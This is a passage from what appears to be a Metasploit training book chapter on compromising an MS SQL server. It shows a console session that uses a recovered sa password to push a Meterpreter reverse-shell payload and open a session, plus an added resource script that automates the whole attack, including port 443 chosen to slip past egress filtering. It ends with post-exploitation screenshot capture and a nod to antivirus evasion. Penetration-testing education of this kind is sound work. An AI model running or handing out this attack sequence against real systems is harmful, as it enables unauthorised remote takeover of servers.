Chapter 6
msf exploit(mssql_payload) > set LPORT 443
LPORT => 443
msf exploit(mssql_payload) > set RHOST 192.168.33.130
RHOST => 192.168.33.130
msf exploit(mssql_payload) > set PASSWORD password123
PASSWORD => password123
msf exploit(mssql_payload) > exploit
[*] Started reverse handler on 192.168.33.129:443
[*] Command Stager progress - 2.78% done (1494/53679 bytes)
[*] Command Stager progress - 5.57% done (2988/53679 bytes)
[*] Command Stager progress - 8.35% done (4482/53679 bytes)
. . . SNIP . . .
[*] Command Stager progress - 97.32% done (52239/53679 bytes)
[*] Sending stage (748032 bytes)
[*] Meterpreter session 1 opened (192.168.33.129:443 -> 192.168.33.130:1699)
meterpreter >
After selecting the mssql_payload module and setting our payload to Meterpreter, all we need to do is set the standard options (here LPORT, RHOST, and the PASSWORD for the sa account; LHOST was set earlier and shows up in the "Started reverse handler" line) and run exploit. The Command Stager lines show the module pushing the payload to the target through MS SQL, and the final line confirms that a Meterpreter session has been opened on the target machine.
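The same sequence can be run non-interactively from an msfconsole resource script, which is handy for repeating an attack against a lab target or for keeping an exact record of the options used. The script below is an added example and is not from the book; it assumes the payload is windows/meterpreter/reverse_tcp (the text only says "meterpreter", and the "Started reverse handler" line is consistent with a reverse TCP payload), takes LHOST from that handler line, and sets USERNAME explicitly even though sa is the module default. Note that current Metasploit releases name the target option RHOSTS; the script uses RHOST as shown on this page.

```msfconsole
# mssql_payload.rc (added example, not from the book)
# Run with: msfconsole -r mssql_payload.rc
# Lines starting with # are ignored; options must be on their own lines
# because "set" treats everything after the option name as the value.

use exploit/windows/mssql/mssql_payload

# Payload name is an assumption; the page only says "meterpreter".
set PAYLOAD windows/meterpreter/reverse_tcp

# Our machine, taken from the "Started reverse handler" line above.
set LHOST 192.168.33.129

# A reverse connection on 443 is less likely to be blocked by egress filtering.
set LPORT 443

# Target MS SQL server (RHOSTS on newer Metasploit versions).
set RHOST 192.168.33.130

# sa is the module default; set it explicitly so the script is self-contained.
set USERNAME sa

# Password recovered earlier in this chapter.
set PASSWORD password123

# Review every option before launching.
show options

# -z: do not interact with the session automatically; pick it up afterwards.
exploit -z
```

After the script finishes, list the sessions with sessions -l and attach to the new one with sessions -i 1 to reach the meterpreter > prompt shown above.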
To recap, in the attack described here, we used the mssql_ping module to guess the MS SQL sa password, which we discovered is password123. We then leveraged the mssql_payload module to authenticate to MS SQL with that password and upload a Meterpreter shell through MS SQL, and the shell was presented to us, thereby completely compromising the system. Once the Meterpreter prompt appears, we know that the exploit was successful and we can continue with post-exploitation on this system.
Basic Meterpreter Commands
Having successfully compromised the target and gained a Meterpreter console on the system, we can glean more information with some basic Meterpreter commands. Use the help command at any point for more information on how to use Meterpreter.
Capturing a Screenshot
Meterpreter's screenshot command captures an image of the active user's desktop and saves it with a random filename in the directory msfconsole was started from, which in this case is /opt/metasploit3/msf3/, as shown in Figure 6-1.
meterpreter > screenshot
Screenshot saved to: /opt/metasploit3/msf3/yVHXaZar.jpeg
Desktop screen captures offer a great way to learn about a target system. For example, in Figure 6-1, we can see that McAfee antivirus software is installed and running, which means we'll need to be cautious about what we upload to the system: anything written to disk, as opposed to staged in memory, risks being detected and quarantined. (Chapter 7 discusses antivirus evasion in more detail.)